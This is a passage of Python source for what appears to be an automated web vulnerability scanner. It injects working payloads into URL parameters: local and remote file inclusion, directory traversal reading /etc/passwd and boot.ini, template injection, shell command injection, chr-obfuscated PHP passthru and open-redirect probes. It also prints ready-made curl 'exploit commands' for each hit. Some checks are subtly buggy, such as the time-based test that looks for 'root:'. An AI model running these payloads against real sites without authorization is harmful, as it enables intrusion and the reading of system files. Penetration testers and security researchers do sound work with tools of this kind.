        rfi_exploit = '/etc/passwd%00'
        if (verbose == "y"):
            print (COLOR2 + "[i] Trying Payload: " + str(rfi_exploit) + RESET)

        rfi_url = new_url.replace("INJECTX", rfi_exploit)
        http_request = urllib.request.urlopen(rfi_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rfi_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "root:" in http_response:
            print(OKRED + "[+] Linux Local File Inclusion Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rfi_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rfi_url + "' | egrep 'root:' --color=auto" + RESET)
            f.write("P2 - HIGH, Local File Inclusion, " + str(rfi_url) + ", " + str(rfi_exploit) + "\n")

    except:
        pass

    # LFI Check 3 ######################################################################################
    try:
        rfi_exploit = 'C:\\boot.ini'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(rfi_exploit) + RESET)

        rfi_url = new_url.replace("INJECTX", rfi_exploit)
        http_request = urllib.request.urlopen(rfi_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rfi_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "boot loader" in http_response or "16-bit" in http_response:
            print(OKRED + "[+] Windows Local File Inclusion Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rfi_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rfi_url + "' | egrep 'root:' --color=auto" + RESET)
            f.write("P2 - HIGH, Local File Inclusion, " + str(rfi_url) + ", " + str(rfi_exploit) + "\n")

    except:
        pass

    # LFI Check 4 ######################################################################################
    try:
        rfi_exploit = 'C:\\boot.ini%00'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(rfi_exploit) + RESET)

        rfi_url = new_url.replace("INJECTX", rfi_exploit)
        http_request = urllib.request.urlopen(rfi_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rfi_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "boot loader" in http_response or "16-bit" in http_response:
            print(OKRED + "[+] Local File Inclusion Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rfi_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rfi_url + "' | egrep 'root:' --color=auto" + RESET)
            f.write("P2 - HIGH, Local File Inclusion, " + str(rfi_url) + ", " + str(rfi_exploit) + "\n")

    except:
        pass

    # RFI Check ######################################################################################
    try:
        rfi_exploit = 'hTtP://tests.arachni-scanner.com/rfi.md5.txt'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(rfi_exploit) + RESET)

        rfi_url = new_url.replace("INJECTX", rfi_exploit)
        http_request = urllib.request.urlopen(rfi_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rfi_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "705cd559b16e6946826207c2199bd890" in http_response:
            print(OKRED + "[+] Remote File Inclusion Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rfi_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rfi_url + "' | egrep 705cd559b16e6946826207c2199bd890 --color=auto")
            f.write("P2 - HIGH, Remote File Inclusion, " + str(rfi_url) + ", " + str(rfi_exploit) + "\n")

    except:
        pass

    # RFI Check 2 ######################################################################################
    try:
        rfi_exploit = 'hTtP://tests.arachni-scanner.com/rfi.md5.txt%00'
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(rfi_exploit) + RESET)

        rfi_url = new_url.replace("INJECTX", rfi_exploit)
        http_request = urllib.request.urlopen(rfi_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rfi_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "705cd559b16e6946826207c2199bd890" in http_response:
            print(OKRED + "[+] Remote File Inclusion Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rfi_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rfi_url + "' | egrep 705cd559b16e6946826207c2199bd890 --color=auto")
            f.write("P2 - HIGH, Remote File Inclusion, " + str(rfi_url) + ", " + str(rfi_exploit) + "\n")

    except:
        pass

    # IDOR Check ######################################################################################
    #idor_list = [1,2,3]
    #idor_length_list = []
    #for idor in idor_list:
    #    try:
    #        idor_exploit = str(idor)
    #        # print COLOR2 + "[i] Trying Payload: " + str(idor) + RESET
    #        idor_url = new_url.replace("INJECTX", idor_exploit)
    #        http_request = urllib.request.urlopen(idor_url)
    #        http_response = http_request.read()
    #        http_length = len(http_response)
    #        http_status = http_request.getcode()
    #        idor_length_list.append(http_length)
    #        http_length_diff = str(http_length_base - http_length)
    #        #print(COLOR2 + "[i] New URL: " + idor_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)
    #
    #        if (idor_length_list[0] != idor_length_list[1]) or (idor_length_list[1] != idor_length_list[2]) or (idor_length_list[0] != idor_length_list[2]):
    #            print(OKRED + "[+] Possible IDOR Found! " + RESET)
    #            print(OKRED + "[+] Vulnerable URL: " + idor_url + RESET)
    #            print(OKGREEN + "[c] Exploit Command: curl -s '" + idor_url + "'")
    #        #else:
    #            #print(COLOR1 + "[F] IDOR Failed." + RESET)
    #    except:
    #        pass

    # Buffer Overflow Check ######################################################################################
    #try:
    #    overflow_exploit = "INJECTX" * 4000
    #    # print COLOR2 + "[i] Trying Payload: " + "INJECTXINJECTXINJECTXINJECTXINJECTXINJECTX..." + RESET
    #    overflow_url = new_url.replace("INJECTX", overflow_exploit)
    #    http_request = urllib.request.urlopen(overflow_url)
    #    http_response = http_request.read()
    #    http_length = len(http_response)
    #    http_status = http_request.getcode()
    #    print COLOR2 + "[i] New URL: " + new_url + "INJECTXINJECTXINJECTXINJECTXINJECTXINJECTX..." + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + RESET
    #
    #    if http_status != 200 or http_status != 414 or http_status != 413:
    #        print OKGREEN + "[+] Possible Buffer Overflow Found! " + RESET
    #    else:
    #        print COLOR1 + "[F] Buffer Overflow Failed." + RESET
    #except:
    #    pass
    #

    # SSTI Check ######################################################################################
    try:
        ssti_exploit = urllib.parse.quote('{{1336%2B1}}')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(ssti_exploit) + RESET)
        ssti_url = new_url.replace("INJECTX", ssti_exploit)
        http_request = urllib.request.urlopen(ssti_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + ssti_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "1337" in http_response:
            print(OKRED + "[+] Server Side Template Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + ssti_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + ssti_url + "' | egrep 1337 --color=auto" + RESET)
            f.write("P3 - MEDIUM, Server Side Template Injection, " + str(ssti_url) + ", " + str(ssti_exploit) + "\n")

    except:
        pass

    # SSTI Check 2 ######################################################################################
    try:
        ssti_exploit = urllib.parse.quote('1336+1')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(ssti_exploit) + RESET)

        ssti_url = new_url.replace("INJECTX", ssti_exploit)
        http_request = urllib.request.urlopen(ssti_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + ssti_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "1337" in http_response:
            print(OKRED + "[+] Server Side Template Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + ssti_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + ssti_url + "' | egrep 1337 --color=auto" + RESET)
            f.write("P3 - MEDIUM, Server Side Template Injection, " + str(ssti_url) + ", " + str(ssti_exploit) + "\n")

    except:
        pass

    # RCE Linux Check ######################################################################################
    try:
        rce_exploit = urllib.parse.quote('$(cat+/etc/passwd)')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(rce_exploit) + RESET)

        rce_url = new_url.replace("INJECTX", rce_exploit)
        http_request = urllib.request.urlopen(rce_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rce_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "root:" in http_response:
            print(OKRED + "[+] Linux Command Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rce_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rce_url + "' | egrep root: --color=auto" + RESET)
            f.write("P1 - Critical, Command Execution, " + str(rce_url) + ", " + str(rce_exploit) + "\n")

    except:
        pass

    # RCE Linux Check 2 ######################################################################################
    try:
        rce_exploit = urllib.parse.quote('$(sleep+10)')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(rce_exploit) + RESET)

        rce_url = new_url.replace("INJECTX", rce_exploit)
        http_request = urllib.request.urlopen(rce_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rce_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "root:" in http_response:
            print(OKRED + "[+] Linux Time Based Command Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rce_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rce_url + "' | egrep root: --color=auto" + RESET)
            f.write("P1 - Critical, Command Execution, " + str(rce_url) + ", " + str(rce_exploit) + "\n")

    except:
        pass

    # RCE PHP Check ######################################################################################
    try:
        rce_exploit = urllib.parse.quote('phpinfo()')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(rce_exploit) + RESET)

        rce_url = new_url.replace("INJECTX", rce_exploit)
        http_request = urllib.request.urlopen(rce_url)
        http_response = http_request.read()
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rce_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "<title>phpinfo()</title>" in http_response:
            print(OKRED + "[+] Generic PHP Command Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rce_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rce_url + "' | egrep PHP --color=auto" + RESET)
            f.write("P1 - Critical, Command Execution, " + str(rce_url) + ", " + str(rce_exploit) + "\n")

    except:
        pass

    # RCE PHP Check 2 ######################################################################################
    try:
        rce_exploit = urllib.parse.quote('{${passthru(chr(99).chr(97).chr(116).chr(32).chr(47).chr(101).chr(116).chr(99).chr(47).chr(112).chr(97).chr(115).chr(115).chr(119).chr(100))}}{${exit()}}')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(ssti_exploit) + RESET)

        rce_url = new_url.replace("INJECTX", rce_exploit)
        http_request = urllib.request.urlopen(rce_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rce_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "root:" in http_response:
            print(OKRED + "[+] Linux PHP Command Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rce_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rce_url + "' | egrep root: --color=auto" + RESET)
            f.write("P1 - Critical, Command Execution, " + str(rce_url) + ", " + str(rce_exploit) + "\n")

    except:
        pass

    # RCE PHP Check 3 ######################################################################################
    try:
        rce_exploit = urllib.parse.quote('{${passthru(chr(115).chr(108).chr(101).chr(101).chr(112).chr(32).chr(49).chr(48))}}{${exit()}}')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(ssti_exploit) + RESET)

        rce_url = new_url.replace("INJECTX", rce_exploit)
        http_request = urllib.request.urlopen(rce_url)
        http_response = str(http_request.read())
        http_length = len(http_response)
        http_length_diff = str(http_length_base - http_length)
        http_status = http_request.getcode()
        if (verbose == "y"):
            print(COLOR2 + "[i] New URL: " + rce_url + " [" + OKRED + str(http_status) + COLOR2 + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

        if "root:" in http_response:
            print(OKRED + "[+] PHP Command Injection Found! " + RESET)
            print(OKRED + "[+] Vulnerable URL: " + rce_url + RESET)
            print(OKGREEN + "[c] Exploit Command: curl -s '" + rce_url + "' | egrep root: --color=auto" + RESET)
            f.write("P1 - Critical, Command Execution, " + str(rce_url) + ", " + str(rce_exploit) + "\n")

    except:
        pass

logo()
if len(sys.argv) < 2:
    print("You need to specify a URL to scan (ie. -u https://site.com). Use --help for all options.")
    sys.exit()
else:
    parser = optparse.OptionParser()
    parser.add_option('-u', '--url',
                      action="store", dest="url",
                      help="Full URL to spider", default="")

    parser.add_option('-c', '--cookie',
                      action="store", dest="cookie",
                      help="Cookies to send", default="")

    parser.add_option('-v', '--verbose',
                      action="store", dest="verbose",
                      help="Set verbose mode ON", default="n")

options, args = parser.parse_args()
cookies = str(options.cookie)
verbose = str(options.verbose)
full_url = str(options.url)
payload = "INJECTX"
http_status_base = "404"
http_length_base = "0"

try:
    http_request_base = urllib.request.urlopen(full_url)
    http_response_base = http_request_base.read()
    http_length_base = len(http_response_base)
    http_status_base = http_request_base.getcode()

    print(RESET)
    print(COLOR3 + ">>> " + OKORANGE + full_url + COLOR2 + " [" + OKRED + str(http_status_base) + COLOR2 + "]" + " [" + COLOR3 + str(http_length_base) + COLOR2 + "]" + RESET)
    print(COLOR3 + "======================================================================================================" + RESET)

except:
    print(RESET)
    print(COLOR3 + ">>> " + OKORANGE + full_url + COLOR2 + " [" + OKRED + str(http_status_base) + COLOR2 + "]" + " [" + COLOR3 + str(http_length_base) + COLOR2 + "]" + RESET)
    print(COLOR3 + "======================================================================================================" + RESET)

if str(http_status_base) == "404":
    print(COLOR1 + "[F] Received HTTP Status 404 - Page Not Found. Skipping..." + RESET)

elif str(http_status_base) == "403":
    print(COLOR1 + "[F] Received HTTP Status 403 - Page Not Found. Skipping..." + RESET)

else:
    if "=" in full_url:

        parsed = urllib.request.urlparse(full_url)
        params = urllib.parse.parse_qsl(parsed.query)
        param_list = []
        param_vals = []
        param_length = 0
        for x,y in params:
            param_list.extend([str(x + "=")])
            param_vals.extend([str(urllib.parse.quote_plus(y))])
            param_length = param_length + 1

        # FIND BASE URL
        dynamic_url = full_url.find("?")
        base_url = str(full_url[:dynamic_url + 1])

        # LIST EACH PARAMETER
        active_fuzz = 1
        i = 1

        http_request_base = urllib.request.urlopen(full_url)
        http_response_base = http_request_base.read()
        http_length_base = len(http_response_base)
        http_status_base = http_request_base.getcode()

        print(RESET)
        print(COLOR3 + ">>> " + OKORANGE + full_url + COLOR2 + " [" + OKRED + str(http_status_base) + COLOR2 + "]" + " [" + COLOR3 + str(http_length_base) + COLOR2 + "]" + RESET)
        print(COLOR3 + "======================================================================================================" + RESET)

        while i <= param_length and active_fuzz <= param_length:
            if (i < param_length and i == active_fuzz):
                print(OKORANGE + "[D] Fuzzing Parameter: " + param_list[i-1] + RESET)
                print(OKORANGE + "----------------------------------------------------" + RESET)
                base_url += param_list[i-1] + payload + "&"
                i = i+1

            elif (i == param_length and i == active_fuzz):
                print(OKORANGE + "[D] Fuzzing Parameter: " + param_list[i-1] + RESET)
                print(OKORANGE + "----------------------------------------------------" + RESET)
                base_url += param_list[i-1] + payload
                active_fuzz = active_fuzz+1
                i = i+1
                active_scan()
                base_url = str(full_url[:dynamic_url + 1])

            elif (i == param_length and i != active_fuzz):
                base_url += param_list[i-1] + param_vals[i-1]
                active_fuzz = active_fuzz+1
                i = 1
                active_scan()
                base_url = str(full_url[:dynamic_url + 1])

            elif (i == param_length):
                base_url += param_list[i-1] + param_vals[i-1]
                active_fuzz = active_fuzz+1
                i = 1
                active_scan()
                base_url = str(full_url[:dynamic_url + 1])

            else:
                base_url += param_list[i-1] + param_vals[i-1] + "&"
                i = i+1


    else:
        new_url = full_url + 'INJECTX'
        redirect_exploit = urllib.parse.quote('//google.com')

        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)

        redirect_url = new_url.replace("INJECTX", redirect_exploit)

        try:
            http_request = urllib.request.urlopen(redirect_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_status = http_request.getcode()
            http_length_diff = str(http_length_base - http_length)

            if (verbose == "y"):
                print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            if "<title>Google</title>" in http_response:
                print(OKRED + "[+] Open Redirect Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto" + RESET)
                f.write("P3 - MEDIUM, Open Redirect, " + str(redirect_url) + ", " + str(redirect_exploit) + "\n")

        except:
            pass

        # Open Redirect ######################################################################################
        redirect_exploit = urllib.parse.quote('/<>//google.com')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)

        redirect_url = new_url.replace("INJECTX", redirect_exploit)

        try:
            http_request = urllib.request.urlopen(redirect_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_status = http_request.getcode()
            http_length_diff = str(http_length_base - http_length)

            if (verbose == "y"):
                print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            if "<title>Google</title>" in http_response:
                print(OKRED + "[+] Open Redirect Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto" + RESET)
                f.write("P3 - MEDIUM, Open Redirect, " + str(redirect_url) + ", " + str(redirect_exploit) + "\n")

        except:
            pass

        new_url = full_url + 'INJECTX'

        # Open Redirect ######################################################################################
        redirect_exploit = urllib.parse.quote('/%252F%252Fgoogle.com')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)

        redirect_url = new_url.replace("INJECTX", redirect_exploit)

        try:
            http_request = urllib.request.urlopen(redirect_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_status = http_request.getcode()
            http_length_diff = str(http_length_base - http_length)

            if (verbose == "y"):
                print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            if "<title>Google</title>" in http_response:
                print(OKRED + "[+] Open Redirect Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto" + RESET)
                f.write("P3 - MEDIUM, Open Redirect, " + str(redirect_url) + ", " + str(redirect_exploit) + "\n")

        except:
            pass

        new_url = full_url + 'INJECTX'

        # Open Redirect ######################################################################################
        redirect_exploit = urllib.parse.quote('////google.com/%2e%2e')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)

        redirect_url = new_url.replace("INJECTX", redirect_exploit)

        try:
            http_request = urllib.request.urlopen(redirect_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_status = http_request.getcode()
            http_length_diff = str(http_length_base - http_length)

            if (verbose == "y"):
                print(COLOR2 + "[i] New URL: " + redirect_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            if "<title>Google</title>" in http_response:
                print(OKRED + "[+] Open Redirect Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto" + RESET)
                f.write("P3 - MEDIUM, Open Redirect, " + str(redirect_url) + ", " + str(redirect_exploit) + "\n")

        except:
            pass

        new_url = full_url + 'INJECTX'

        # Open Redirect ######################################################################################
        redirect_exploit = urllib.parse.quote('/https:/%5cgoogle.com/')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(redirect_exploit) + RESET)

        redirect_url = new_url.replace("INJECTX", redirect_exploit)

        try:
            http_request = urllib.request.urlopen(redirect_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_status = http_request.getcode()
            http_length_diff = str(http_length_base - http_length)

            if (verbose == "y"):
                print(COLOR2 + "[i] New URL: " + str(redirect_url) + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + str(http_length_diff) + COLOR2 + "]" + RESET)

            if "<title>Google</title>" in http_response:
                print(OKRED + "[+] Open Redirect Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + redirect_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s -I '" + redirect_url + "' | egrep location --color=auto" + RESET)
                f.write("P3 - MEDIUM, Open Redirect, " + str(redirect_url) + ", " + str(redirect_exploit) + "\n")

        except:
            pass

        new_url = full_url + 'INJECTX'

        # Windows Directory Traversal ######################################################################################
        traversal_exploit = urllib.parse.quote('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\\\boot.ini')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)

        try:
            http_request = urllib.request.urlopen(traversal_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_length_diff = str(http_length_base - http_length)
            http_status = http_request.getcode()
            if (verbose == "y"):
                print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            if "boot loader" in http_response or "16-bit" in http_response:
                print(OKRED + "[+] Windows Directory Traversal Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep Windows --color=auto" + RESET)
                f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")
        except:
            pass

        new_url = full_url + 'INJECTX'

        # Windows Directory Traversal 2 ######################################################################################
        traversal_exploit = urllib.parse.quote('..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\\\boot.ini%00')
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)

        try:
            http_request = urllib.request.urlopen(traversal_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_length_diff = str(http_length_base - http_length)
            http_status = http_request.getcode()
            if (verbose == "y"):
                print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            if "boot loader" in http_response or "16-bit" in http_response:
                print(OKRED + "[+] Windows Directory Traversal Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep Windows --color=auto" + RESET)
                f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")
        except:
            pass


        new_url = full_url + 'INJECTX'


        # Windows Directory Traversal 3 ######################################################################################
        try:
            traversal_exploit = urllib.parse.quote('..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00test.htm')
            if (verbose == "y"):
                print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

            traversal_url = new_url.replace("INJECTX", traversal_exploit)

            try:
                http_request = urllib.request.urlopen(traversal_url)
                http_response = str(http_request.read())
                http_length = len(http_response)
                http_length_diff = str(http_length_base - http_length)
                http_status = http_request.getcode()
                if (verbose == "y"):
                    print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

                if "boot loader" in http_response or "16-bit" in http_response:
                    print(OKRED + "[+] Windows Directory Traversal Found! " + RESET)
                    print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
                    print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep Windows --color=auto" + RESET)
                    f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")
            except:
                pass
        except:
            pass

        # Linux Directory Traversal ######################################################################################
        traversal_exploit = urllib.parse.quote("/../../../../../../../../../../../../../../../../../etc/passwd")
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)

        try:
            http_request = urllib.request.urlopen(traversal_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_length_diff = str(http_length_base - http_length)
            http_status = http_request.getcode()
            if (verbose == "y"):
                print(COLOR2 + "[i] New URL: " + traversal_url + " [" + OKRED + str(http_status) + COLOR2 + "]" + " [" + COLOR3 + str(http_length) + COLOR2 + "]" + " [" + COLOR1 + http_length_diff + COLOR2 + "]" + RESET)

            if "root:" in http_response:
                print(OKRED + "[+] Linux Directory Traversal Found! " + RESET)
                print(OKRED + "[+] Vulnerable URL: " + traversal_url + RESET)
                print(OKGREEN + "[c] Exploit Command: curl -s '" + traversal_url + "' | egrep root --color=auto" + RESET)
                f.write("P2 - HIGH, Directory Traversal, " + str(traversal_url) + ", " + str(traversal_exploit) + "\n")

        except:
            pass

        new_url = full_url + 'INJECTX'

        # Linux Directory Traversal 2 ######################################################################################

        traversal_exploit = urllib.parse.quote("/../../../../../../../../../../../../../../../../../etc/passwd%00")
        if (verbose == "y"):
            print(COLOR2 + "[i] Trying Payload: " + str(traversal_exploit) + RESET)

        traversal_url = new_url.replace("INJECTX", traversal_exploit)

        try:
            http_request = urllib.request.urlopen(traversal_url)
            http_response = str(http_request.read())
            http_length = len(http_response)
            http_length_diff = str(http_length_base - http_length)
            http_status = http_request.getcode()

            if (verbose == "y"):
